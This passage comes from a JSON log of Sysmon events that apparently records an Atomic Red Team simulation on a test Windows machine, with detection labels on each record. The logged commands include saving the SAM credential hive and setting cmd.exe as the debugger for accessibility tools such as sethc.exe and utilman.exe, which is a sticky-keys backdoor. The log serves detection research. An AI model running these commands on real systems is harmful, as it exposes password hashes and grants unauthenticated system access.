(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-00102B773100","ProcessId":2148,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.113"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3707,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.147861Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-00102B773100","ParentProcessId":2148,"ProcessGuid":"747F3D96-D87D-5D31-0000-00107D793100","ProcessId":1472,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.169"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3708,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.175813Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010B37B3100","ProcessId":3616,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.209"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3709,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.225776Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010B37B3100","ParentProcessId":3616,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010057E3100","ProcessId":1340,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.246"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3710,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.251689Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-00103B803100","ParentProcessId":324,"ProcessGuid":"747F3D96-D87D-5D31-0000-00108D823100","ProcessId":1224,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.327"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3712,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.331942Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010CA843100","ParentProcessId":3900,"ProcessGuid":"747F3D96-D87D-5D31-0000-00101C873100","ProcessId":3412,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.383"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3714,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.392501Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010FA8A3100","ProcessId":3868,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.541"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3715,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.559318Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010FA8A3100","ParentProcessId":3868,"ProcessGuid":"747F3D96-D87D-5D31-0000-00104C8D3100","ProcessId":6536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.568"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3716,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.572021Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\SAM sam.hive\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D885-5D31-0000-00107F1A3200","ProcessId":2832,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:41.646"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3721,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:41.660271Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Automated Collection Command Prompt"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D88F-5D31-0000-0010BD353200","ProcessId":2780,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:51.971"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3724,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:51.996250Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Automated Collection Command Prompt"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /S /D /c\" dir c: /b /s .docx \"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D88F-5D31-0000-0010BD353200","ParentProcessId":2780,"ProcessGuid":"747F3D96-D890-5D31-0000-001012383200","ProcessId":608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:52.011"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3725,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:52.048002Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D89A-5D31-0000-0010F56D3200","ProcessId":3704,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger","UtcTime":"2019-07-19 14:50:02.212"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3731,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:02.220426Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D89F-5D31-0000-0010BD7F3200","ProcessId":1860,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger","UtcTime":"2019-07-19 14:50:07.307"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3735,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:07.322063Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A2-5D31-0000-0010D5913200","ProcessId":2272,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger","UtcTime":"2019-07-19 14:50:10.275"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3739,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:10.295724Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A5-5D31-0000-0010C39D3200","ProcessId":5000,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe\\Debugger","UtcTime":"2019-07-19 14:50:13.137"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3743,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:13.153167Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A6-5D31-0000-0010A5A93200","ProcessId":5972,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe\\Debugger","UtcTime":"2019-07-19 14:50:14.697"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3747,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:14.716040Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A9-5D31-0000-0010C0C63200","ProcessId":5124,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger","UtcTime":"2019-07-19 14:50:17.979"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3751,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:17.990891Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8AB-5D31-0000-0010A5D23200","ProcessId":5632,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger","UtcTime":"2019-07-19 14:50:19.495"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3755,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:19.516948Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing"],"event":{"Event":{"EventData":{"CommandLine":"wmic.exe process /FORMAT:list","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic.exe process 